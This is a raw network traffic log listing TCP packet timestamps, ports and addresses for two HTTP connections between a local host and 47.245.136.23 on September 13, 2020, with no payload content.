Sep 13, 2020 20:55:06.895347118 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895359993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895368099 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895389080 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895396948 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895423889 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895431995 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895440102 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895446062 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895447016 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895458937 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895473003 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895484924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895498991 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895507097 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895518064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895529985 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895544052 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895551920 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895564079 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895579100 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895584106 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895586967 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895601034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895612001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895622969 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895636082 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895648003 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895659924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895672083 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895683050 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895698071 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895709038 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895716906 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895720959 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895735025 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895745993 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895756960 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895768881 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895792961 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895843983 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895858049 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895863056 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895870924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895878077 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895895958 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895904064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895926952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895942926 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.895945072 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.895950079 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.896033049 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.912260056 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.935875893 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.935899019 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.935905933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.935913086 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936016083 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.936019897 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936039925 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936048031 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936053991 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936060905 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936069965 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936079025 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936084986 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936093092 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936125994 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936144114 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936151028 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936156988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936163902 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936220884 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936242104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936248064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936254978 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936261892 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936268091 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936273098 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.936275005 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936280966 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936300039 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936306953 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936331987 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936341047 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936348915 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936355114 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936368942 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936377048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936398983 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936407089 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936414003 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936436892 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936444998 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936453104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936460018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936475039 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936486006 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936497927 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936510086 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936522007 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936534882 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936546087 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936557055 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936558962 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.936568975 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936585903 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936592102 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936605930 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936616898 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936633110 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936651945 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936660051 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936671019 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936678886 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936691999 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936705112 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936717033 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936728001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936736107 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936753988 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936769009 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936784029 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936794996 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936809063 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936820030 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936830997 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936844110 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936855078 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936867952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936876059 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936892033 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936903000 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936914921 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936925888 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936939001 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936952114 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936963081 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936975002 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936983109 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.936991930 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.936996937 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937011957 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937022924 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937033892 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937045097 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937069893 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937077999 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937104940 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937113047 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937127113 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937138081 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937150002 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937169075 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:06.937354088 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:06.937500954 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:07.189305067 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:07.189476967 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:07.677408934 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:07.677592039 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.019215107 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.046215057 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046242952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046381950 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046412945 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.046417952 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046428919 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046439886 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046458960 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046478033 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046487093 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046495914 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046504974 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046516895 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046528101 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046538115 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046626091 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.046649933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046689034 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046703100 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046720982 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046767950 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046776056 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.046777964 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046797991 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046808004 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046848059 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046860933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.046892881 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.046967983 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.069926023 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.069945097 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.069957018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.069967985 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070030928 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070099115 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070205927 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070225000 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070288897 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070306063 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070324898 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070326090 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070337057 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070347071 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070358038 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070368052 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070385933 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070451021 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070471048 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070486069 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070497036 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070511103 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070522070 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070533991 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070547104 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070559025 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070570946 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070581913 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070583105 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070590973 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070600986 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070611000 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070620060 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070631981 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070642948 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070655107 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070666075 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070678949 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070692062 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070703983 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070715904 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070728064 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070739985 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070751905 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070765018 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070776939 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070789099 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070801020 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070812941 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070820093 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.070825100 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070833921 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070842981 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070853949 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.070971966 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.093971968 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.094010115 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.094021082 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.094031096 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.094043970 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:08.094180107 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.253830910 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.357503891 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.516510963 CEST	49722	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:08.544389009 CEST	80	49722	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.436877012 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.460815907 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.460928917 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.462973118 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.520364046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520382881 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520478964 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.520498037 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520526886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520541906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520554066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520565033 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520693064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520713091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520744085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.520796061 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.520806074 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.544163942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544193983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544213057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544230938 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544305086 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.544564962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544615984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544665098 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.544707060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544771910 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544773102 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.544799089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544848919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544886112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544904947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544910908 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.544933081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544949055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544966936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.544986010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.545007944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.545027018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.545044899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.545048952 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.545063019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.545137882 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.568061113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568200111 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.568285942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568324089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568340063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568351984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568361998 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568371058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568382025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568414927 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.568741083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568768978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568811893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568813086 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.568836927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568856955 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568869114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568903923 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.568928957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568944931 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568972111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.568994999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569006920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569010019 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.569030046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569040060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569057941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569077969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569101095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569116116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569120884 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.569125891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569142103 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569158077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.569175005 CEST	80	49723	47.245.136.23	192.168.2.3
